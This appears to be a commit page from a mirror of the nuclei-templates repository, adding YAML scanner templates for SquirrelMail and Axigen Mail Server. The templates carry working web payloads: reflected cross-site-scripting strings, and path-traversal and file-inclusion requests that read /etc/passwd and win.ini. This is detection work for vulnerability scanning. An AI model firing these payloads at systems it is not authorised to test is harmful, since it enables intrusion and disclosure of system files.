daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #3144 from DhiyaneshGeek/master 

Axigen Mail Server & Squirrel Server
patch-1
Prince Chaddha 2021-11-16 16:09:21 +05:30 committed by GitHub
parent 525a2855a1 029b8f05fe
commit cacf934f38
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
9 changed files with 249 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
cves/2002/CVE-2002-1131.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2002-1131
info:
name: SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities
author: dhiyaneshDk
severity: medium
description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
reference: https://www.exploit-db.com/exploits/21811
tags: xss,squirrelmail,cve,cve2002
requests:
- method: GET
path:
- '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'
- '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'
- '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"

30
cves/2004/CVE-2004-0519.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2004-0519
info:
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
reference: https://www.exploit-db.com/exploits/24068
tags: xss,squirrelmail,cve2004,cve
requests:
- method: GET
path:
- '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"

25
cves/2006/CVE-2006-2842.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2006-2842
info:
name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
author: dhiyaneshDk
severity: high
description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable."
reference: https://www.exploit-db.com/exploits/27948
tags: cve2006,lfi,squirrelmail,cve
requests:
- method: GET
path:
- "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

25
cves/2012/CVE-2012-4940.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2012-4940
info:
name: Axigen Mail Server - 'Filename' Directory Traversal
author: dhiyaneshDk
severity: high
description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI.
reference: https://www.exploit-db.com/exploits/37996
tags: cve,cve2012,axigen,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini'
- '{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini'
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and

24
exposed-panels/axigen-webadmin.yaml Normal file
View File

@ -0,0 +1,24 @@
id: axigen-webadmin
info:
name: Axigen Web Admin
author: dhiyaneshDk
severity: info
metadata:
shodan-query: 'http.title:"Axigen&nbsp;WebAdmin"'
tags: axigen,panel
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Axigen&nbsp;WebAdmin</title>'
- type: status
status:
- 200

24
exposed-panels/axigen-webmail.yaml Normal file
View File

@ -0,0 +1,24 @@
id: axigen-webmail
info:
name: Axigen WebMail
author: dhiyaneshDk
severity: info
metadata:
shodan-query: 'http.title:"Axigen WebMail"'
tags: axigen,panel
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Axigen WebMail</title>'
- type: status
status:
- 200

30
vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml Normal file
View File

@ -0,0 +1,30 @@
id: squirrelmail-vkeyboard-xss
info:
name: SquirrelMail 1.4.2 Address Add Plugin - 'add.php' Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: SquirrelMail Address Add Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
reference: https://www.exploit-db.com/exploits/26305
tags: xss,squirrelmail
requests:
- method: GET
path:
- '{{BaseURL}}/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"

26
vulnerabilities/squirrelmail/squirrelmail-lfi.yaml Normal file
View File

@ -0,0 +1,26 @@
id: squirrelmail-lfi
info:
name: SquirrelMail 1.2.11 Local File Inclusion
author: dhiyaneshDk
severity: high
reference: https://www.exploit-db.com/exploits/22793
tags: lfi,squirrelmail
requests:
- method: GET
path:
- "{{BaseURL}}/src/read_body.php?mailbox=/etc/passwd&passed_id=1&"
- "{{BaseURL}}/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

30
vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml Normal file
View File

@ -0,0 +1,30 @@
id: squirrelmail-vkeyboard-xss
info:
name: SquirrelMail Virtual Keyboard Plugin - 'vkeyboard.php' Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
reference: https://www.exploit-db.com/exploits/34814
tags: xss,squirrelmail
requests:
- method: GET
path:
- '{{BaseURL}}/plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
words:
- "text/html"
part: header